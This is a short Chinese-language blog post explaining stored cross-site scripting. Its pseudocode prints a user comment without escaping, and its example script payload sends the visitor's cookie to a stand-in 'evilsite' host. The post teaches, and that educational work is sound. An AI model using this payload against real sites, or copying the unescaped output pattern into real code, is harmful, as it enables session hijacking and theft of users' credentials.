美文网首页
XSS(Cross-site scripting) 攻击

XSS(Cross-site scripting) 攻击

作者: xiaofudeng | 来源:发表于2017-11-04 23:35 被阅读0次

参考博客

高爽|Coder - XSS攻击及防御
PS: 这篇文章下面的评论区囧到我了, 好像不少人在评论区进行了注入测试, 哈哈.

DoubleSpout - 关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

Cross-site Scripting (XSS) Attack

概念

XSS攻击指的是通过注入等手段让被攻击用户的浏览器执行一段恶意的代码.
比如说某个网站的评论或者发表文章的功能并没有对用户输入进行安全地处理(转义等), 那么很可能显示该输入的页面直接就加载了一段本是纯文本的JavaScript代码.
比如下面这段服务端伪代码来源, 直接输出了最后一条评论. 如果latestComment插入数据库的时候没有被合适地处理过, 直接存储起来了. 比如说<script>window.open("www.evilsite.com?param=" + document.cookie)</script>.

print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"

那么用户访问该页面的时候内容就变成了

<html>
<h1>Most recent comment</h1>
<script>window.open("www.evilsite.com?param=" + document.cookie)</script>
</html>

那么这段恶意代码就被执行了, evilsite网站就会收到用户关于当前网站的cookie.

相关文章

  • 第三章 XSS 攻击

    要点 XSS 攻击 XSS 防护 一、 XSS攻击 XSS攻击 (Cross-Site Scripting,跨站脚...

  • 前端网络安全

    一、XSS攻击 1、概念 ​ Cross-Site Scripting(跨站脚本攻击)简称 XSS,是...

  • XSS攻击

    什么是XSS攻击? Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击...

  • XSS攻击

    XSS(跨站脚本攻击)原理 Xss(cross-site scripting)攻击指的是攻击者向web页面插入恶意...

  • Vue解决V-HTML指令潜在的XSS攻击('v-html' d

    什么是 XSS 攻击? XSS是跨站脚本攻击(Cross-Site Scripting)的简称。 XSS是一种注入...

  • 前端安全:XSS攻击/CSRF攻击

    XSS攻击 什么是 XSS Cross-Site Scripting (跨站脚本攻击)简称XSS,是一种代码注入攻...

  • 前端安全[xss]

    XSS[xss] 简介 XSS,全称Cross-site scripting,跨站[1][#fn1]脚本攻击; 不...

  • xss攻击

    前端安全之XSS攻击 XSS(cross-site scripting跨域脚本攻击)攻击是最常见的Web攻击,其重...

  • 前端安全问题

    XSS攻击 Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在...

  • WEB网站常见的受攻击方式及预防手段

    跨站脚本攻击(XSS) 跨站脚本攻击(XSS,Cross-site scripting)是最常见和基本的攻击WEB...

网友评论

      本文标题:XSS(Cross-site scripting) 攻击

      本文链接:https://www.haomeiwen.com/subject/zhgqmxtx.html